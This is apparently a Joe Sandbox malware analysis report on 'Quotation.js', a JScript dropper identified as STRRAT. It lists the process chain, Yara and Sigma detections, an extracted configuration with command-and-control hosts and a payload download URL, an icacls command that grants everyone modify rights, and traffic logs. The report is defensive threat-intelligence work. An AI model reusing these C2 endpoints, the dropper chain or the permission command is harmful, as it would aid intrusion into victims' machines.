Edit tour

Windows Analysis Report
Quotation.js

Overview

General Information

Sample name:	Quotation.js
Analysis ID:	1562892
MD5:	c3e39b8ea6a8813ffb4001cbd044a027
SHA1:	36dc1ec5510e2531b23931b317e25ae2240df789
SHA256:	1cef3a638243fd070d898fb3edabf7676d050246e736b73cdb9f23201d4f7858
Tags:	jsuser-abuse_ch
Infos:

Detection

STRRAT

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

JScript performs obfuscated calls to suspicious functions

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected STRRAT

Sigma detected: WScript or CScript Dropper

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Yara detected AllatoriJARObfuscator

Contains functionality to query CPU information (cpuid)

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

Queries the installed Java version

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7512 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

javaw.exe (PID: 7588 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\nvbyatbnf.txt" MD5: 6E0F4F812AE02FBCB744A929E74A04B8)

icacls.exe (PID: 7644 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M MD5: 2E49585E4E08565F52090B144062F97E)

conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Configuration

Threatname: STRRAT

{"C2 list": "harold.jetos.com:3608", "url": "http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5", "Proxy": "harold.jetos.com:3608", "lid": "khonsari", "Startup": "false", "Secondary Startup": "true", "Scheduled Task": "true"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_JAVA_Packed_Allatori	Detects files packed with Allatori Java Obfuscator	ditekSHen	0x2fb4:$s1: # Obfuscation by Allatori Obfuscator
00000001.00000002.2982954889.000000000A569000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_STRRAT	Yara detected STRRAT	Joe Security
00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_JAVA_Packed_Allatori	Detects files packed with Allatori Java Obfuscator	ditekSHen	0x24a4:$s1: # Obfuscation by Allatori Obfuscator
Process Memory Space: javaw.exe PID: 7588	JoeSecurity_STRRAT	Yara detected STRRAT	Joe Security
Process Memory Space: javaw.exe PID: 7588	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
Process Memory Space: javaw.exe PID: 7588	INDICATOR_JAVA_Packed_Allatori	Detects files packed with Allatori Java Obfuscator	ditekSHen	0xa9af0:$s1: # Obfuscation by Allatori Obfuscator 0x4100c5:$s1: # Obfuscation by Allatori Obfuscator
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation.js", ProcessId: 7512, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation.js", ProcessId: 7512, ProcessName: wscript.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000003.1720420378.00000252C43EE000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: STRRAT {"C2 list": "harold.jetos.com:3608", "url": "http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5", "Proxy": "harold.jetos.com:3608", "lid": "khonsari", "Startup": "false", "Secondary Startup": "true", "Scheduled Task": "true"}

Multi AV Scanner detection for submitted file

Source: Quotation.js

ReversingLabs: Detection: 18%

Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49886 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49904 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49911 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49912 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49928 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49931 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49942 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49946 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49944 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49961 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49963 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49964 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49968 version: TLS 1.2

Source: Joe Sandbox View	IP Address: 199.232.192.209 199.232.192.209
Source: Joe Sandbox View	IP Address: 20.233.83.145 20.233.83.145

Source: Joe Sandbox View

JA3 fingerprint: 026e5ca865ce1f09da3a81d8a4e3effb

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: repo1.maven.org
Source: global traffic	DNS traffic detected: DNS query: github.com

Source: javaw.exe, 00000001.00000002.2982954889.000000000A569000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A5FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A5FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
Source: javaw.exe, 00000001.00000002.2982954889.000000000A569000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A5FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A604000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A604000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A569000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A60B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000001.00000002.2988463931.0000000015B9A000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.2936252909.0000000015B7B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1774418678.0000000015B72000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.2936715902.0000000015B93000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A70D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 00000001.00000002.2982954889.000000000A5FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com
Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A569000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://policy.camerfirma.com
Source: javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://policy.camerfirma.com0
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/
Source: javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: wscript.exe, 00000000.00000003.1710702029.00000252C3038000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wshsoft.company/jv/jrex.zip
Source: wscript.exe, 00000000.00000003.1721139336.00000252C4DF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wshsoft.company/jv/jrex.zipnf
Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.allatori.com
Source: javaw.exe, 00000001.00000002.2982954889.000000000A992000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.chambersign.org
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A70D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: javaw.exe, 00000001.00000002.2981310516.000000000508C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.000000000500A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005396000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005159000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A70D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: javaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://repo1.mave
Source: javaw.exe, 00000001.00000002.2981310516.00000000050D2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005381000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.000000000500A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005136000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.000000000518C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.00000000051B1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005396000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005148000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://repo1.maven.org
Source: javaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A550000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar
Source: javaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2989008162.0000000016059000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A550000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2989078586.00000000160EA000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005148000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2980872495.0000000001668000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2988964468.0000000015FC8000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2989156025.0000000016179000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar
Source: javaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A550000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jar
Source: javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jarar
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://repository.luxtrust.lu
Source: javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://repository.luxtrust.lu0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
